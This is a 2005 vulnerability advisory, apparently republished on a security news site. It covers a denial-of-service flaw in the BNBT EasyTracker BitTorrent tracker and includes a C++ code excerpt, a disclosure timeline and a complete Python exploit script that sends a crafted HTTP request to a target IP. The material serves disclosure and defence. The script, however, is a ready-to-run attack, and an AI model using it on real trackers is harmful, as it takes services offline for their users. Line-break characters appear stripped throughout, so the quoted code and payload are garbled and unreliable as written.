Ads BNBT EasyTracker DoS Wednesday, 21 September 2005 Summary "The Trinity Edition of BNBT (TrinEdit) a modified version of BNBT, whose C++ source can be compiled for any operating system; BNBT EasyTracker a Windows Installer for The Trinity Edition of BNBT, a C++ BitTorrent Tracker." A Denial of Service vulnerability exists within BNBT which allows an attacker to cause the BNBT to stop responding. Credit: The information has been provided by Sowhat. The original article can be found at: http://secway.org/advisory/AD20050830.txt Details Vulnerable Systems: * BNBT version 7.7r3.2004.10.27 and prior A specifically crafted HTTP request will cause the BNBT Server stop responding. By Sending a request such as "GET /index.htm HTTP/1.1 : " will cause the DoS. It seems that the bug is located in client.cpp, "//grab headers" section. Code snips: client.cpp: // grab headers string :: size_type iNewLine = m_strReceiveBuf.find( " " ); string :: size_type iDoubleNewLine = m_strReceiveBuf.find( " " ); strTemp = m_strReceiveBuf.substr( iNewLine + strlen( " " ), iDoubleNewLine - iNewLine - strlen( " " ) ); while( 1 ) { string :: size_type iSplit = strTemp.find( ":" ); string :: size_type iEnd = strTemp.find( " " ); if( iSplit == string :: npos ) { UTIL_LogPrint( "client warning - malformed HTTP request (bad header) " ); break; } string strKey = strTemp.substr( 0, iSplit ); string strValue = strTemp.substr( iSplit + strlen( ": " ), iEnd - iSplit - strlen( " " ) );//Bug here ?? rqst.mapHeaders.insert( pair( strKey, strValue ) ); strTemp = strTemp.substr( iEnd + strlen( " " ) ); if( iEnd == string :: npos ) break; } Disclosure Timeline: 2005.08.22 Vendor notified via Webform,no email found 2005.08.30 Vendor no response. Advisory Released Exploit: //BNBTDOS.py # BNBT EasyTracker Remote D.O.S Exploit # Bug discoverd and coded by Sowhat # http://secway.org # Version 7.7r3.2004.10.27 and below # the BNBT project: http://bnbteasytracker.sourceforge.net/ import sys import string import socket if (len(sys.argv) != 2): print " Usage: " + sys.argv[0] + " TargetIP " print "#################################" print "# #" print "# BNBT EasyTracker Remote D.O.S Exploit #" print "# Bug discoverd and coded by Sowhat #" print "# http://secway.org #" print "#################################" sys.exit(0) host = sys.argv[1] port = 6969 payload = "GET /index.htm HTTP/1.1 : " s = socket.socket(socket.AF_INET,socket.SOCK_STREAM) s.connect((host,port)) s.send(payload) #EoF   < Prev   Next > [ Back ]

Main Menu SpamAlerts | Windows | Linux | Tutorials | Excell | WhitePapers | News | Spam | Virus Windows Focus VNews Vulnerability Hacking Sql Injection map Downloads Affiliates Online Store Free Ringtones Seo Directory IWebListin Jobs in India Freshers Jobs listings. Winkeyfinder

Copyright 2005-2007 SpamAlertz.com, Content on this site is From variuos other emails, and Advisories.